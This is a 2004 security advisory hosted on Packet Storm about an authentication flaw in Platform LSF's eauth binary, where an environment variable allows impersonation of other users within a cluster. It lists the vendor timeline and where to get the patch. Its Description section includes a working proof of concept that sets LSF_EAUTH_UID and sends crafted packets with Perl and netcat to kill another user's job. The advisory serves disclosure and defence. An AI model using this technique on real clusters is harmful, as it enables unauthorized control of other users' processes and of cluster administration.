what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Lam3rZ-022004.txt

Lam3rZ-022004.txt
Posted Feb 23, 2004
Authored by Tomasz Grabowski

Lam3rZ Security Advisory #2/2004 - Load Sharing Facility, or LSF, versions 4.x through 6.x, has a remotely accessible vulnerability. The eauth binary can be exploited to send commands to LSF on behalf of a different user. In this way a user could submit and control jobs on behalf of other users.

tags | advisory
SHA-256 | 9d66fa78163f5f238d88d57528f15373ea708f46a350fadeeb078178ee161498

Lam3rZ-022004.txt

Change Mirror Download

Lam3rZ Security Advisory #2/2004

23 Feb 2004

Remote (within a cluster) root in LSF


Name: Load Sharing Facility versions 4.x, 5.x, 6.x
Severity: High
Vendor URL: https://www.platform.com
Author: Tomasz Grabowski (cadence@aci.com.pl)
Vendor notified: 29 Oct 2003
Vendor confirmed: 30 Oct 2003
Vendor advisory: 9 Feb 2004


Note:
-----

This vulnerability differs from the one described in Lam3rZ Security
Advisory #1/2004.


Impact:
-------

"eauth" is the component within LSF which controls authenication. It can
be exploited to send commands to LSF on behalf of a different user. In
this way a user could submit and control jobs on behalf of other users.
This security risk is contained to "local cluster". This means that it can
be exploited remotely (from one host to another) but only between hosts
within the LSF cluster.



Description:
------------

"eauth" has a very dangerous undocumented feature. Namely, during its
execution, it is checking for LSF_EAUTH_UID environment variable. If it
finds it, it is using it instead of the real UID of the user which invoked
"eauth" binary. This way attacker is able to generate authentication
string of any user in the system. It can be used to control processes on
behalf of other users in the cluster. Moreover, as such authentication
string is used for some administrative commands, attacker is able to
control the cluster itself.

In order to steal other user's process attacker needs to know
authentication data for that user. In most cases she will need just
"lsfadmin" authentication data, because this user can control other user's
processes, but let's say she wants to steal process from user "cadence".

$cat /etc/passwd|grep cadence
cadence:x:500:500:Tomasz Grabowski:/home/cadence:/bin/bash
$ export LSF_EAUTH_UID=500
$ eauth -c hostname
,',0/%+-$%$&&,/)

Now, she needs to send packets. She can do it, for the sake of simplicity,
using Perl and NetCat software:

(
# first packet
perl -e 'print "\x04\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00";
print "\x00\x00\x00\x00";
'
sleep 1;

#let's call it a header, packet length
perl -e 'print "\x00\x04\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x40";
#below we provide UID, GID and length of user name
print "\x00\x00\x00\x00\x00\x00\x03\xee\x00\x00\x03\xee\x00\x00\x00\x07";
#below is the user name, end indicator, and probably auth data field length
print "\x63\x61\x64\x65\x6e\x63\x65\x00\x00\x00\x00\x03\x00\x00\x00\x10";
#again authentication length and auth data itself
print "\x00\x00\x00\x10\x2a\x30\x26\x24\x21\x25\x2e\x23\x2c\x23\x27\x2d";
#rest of auth data, end indicator, question code (x09 - bkill) and process number
print "\x2f\x28\x2b\x25\x00\x00\x00\x02\x00\x00\x00\x09\x00\x00\x00\x77";
print "\x00\x00\x00\x00";
'
#send it to the target daemon
) | nc 192.168.10.106 6881

After sending these two packets, she will kill process number 119
belonging to user "cadence".



How to patch:
-------------

This problem has been directly addressed in a security patch released for
LSF. The fix is contained to the "eauth" binary which will need to be
replaced for each platform used in the cluster. The patch can be
downloaded from Platform FTP site.

FTP: ftp.platform.com
Path: patches/<version>/os/<os>/eauth*
Example: patches/5.1/os/sparc-sol7-64/eauth5.1_sparc-sol7-64.Z

If the OS or version is not currently available, it can be built on
demand. Please contact Platform Technical Support if you have any
questions or concerns.
Phone: 1-877-444-4573
Email: support@platform.com



References:
-----------

This bug was confirmed in Platform's official security advisory dated
9 Feb 2004. It is accessible directly from Platform as Knowledge Base
Article KB1-5T4XV.


--
Tomasz Grabowski
Technical University of Szczecin, +48 (91)4494234
Academic Centre of Computer Science www.man.szczecin.pl
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close